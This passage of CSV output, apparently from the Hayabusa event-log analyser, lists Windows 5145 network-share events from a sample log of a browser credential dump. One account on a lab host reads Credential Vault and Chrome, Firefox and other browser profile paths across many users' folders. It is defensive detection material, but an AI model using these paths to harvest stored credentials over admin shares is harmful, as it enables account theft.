Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.577 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.624 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.640 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.783 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 